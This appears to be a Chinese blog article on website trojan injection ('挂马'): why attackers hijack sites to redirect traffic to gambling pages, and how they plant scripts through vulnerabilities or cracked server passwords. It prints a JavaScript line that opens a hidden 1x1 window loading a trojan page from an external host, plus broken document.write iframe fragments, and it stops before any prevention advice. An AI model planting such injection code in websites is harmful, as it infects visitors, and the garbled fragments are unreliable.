网站被挂马的处理办法以及预防措施


喜欢的朋友可以关注下。

相信很多的朋友都有遇见过,通过百度快照访问一个网站被跳转到另一个目标网站。

这就说明网站被劫持了,那么黑客为什么要劫持这些网站呢?黑客一般选择什么样的网站下手?下面我们就一起分析一下。

首先黑客一般都会选择信息类网站,购物网站等,因为这些网站的IP高,劫持这些网站能达到他们的引流目的。我们这来做一个假设,如果有100个用户准备访问A网站,但都被劫持到B网站了,那么只是会有10%的用户会对B网站产生兴趣,那么他们的引流目的就达到了,对于A网站而言,他们就损失了部分用户,这是他们不愿看见的,所以他们是很痛恨黑客的。

当然被黑客劫持的网站往往他们都会引流到一些菠菜类的网站,相信很多人看了都会有去搏一搏的心态,一玩不要紧,如果你的控制能力很差的话,那么你就深深的陷入了,这是一个吃人不吐骨头的,这里还是温馨的提醒大家 不要有赌博的心态,不说题外话了,下面我们就一起来看看所谓的木马。

首先,我们需要弄清楚黑客一般是通过哪些渠道来给网站挂木马的。

1.通过漏洞(例如一个软件的漏里,给你的服务器上传一些命令脚本)

2.破解你的服务器账号密码,创建子用户,任意上传脚本文件

这里我来例举一些常见的木马脚本命令:

现在最多见的JS挂马方法有两种,一种是直接将JavaScript脚本代码写在网页中,当访问者在浏览网页时,恶意的挂马脚本就会通过用户的浏览器悄悄地打开网马窗口,隐藏地运行。

这种方法使用的关键代码如下:

window.open("http://www.mahaixiang.cn/木马.html","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");

这种代码往往很长,很容易被安全工程师发现,而且没有经验的黑客也喜欢将“width”和“height”参数设为“0”,但是设置为0后,可能会出现恶意代码不运行的情况。

另外一种JS挂马方式是,黑客先将挂马脚本代码“document.write(‘<Iframe src=”网页木马地址” >

或者

document.write("
") document.write("") document.write("
")

还有这种方式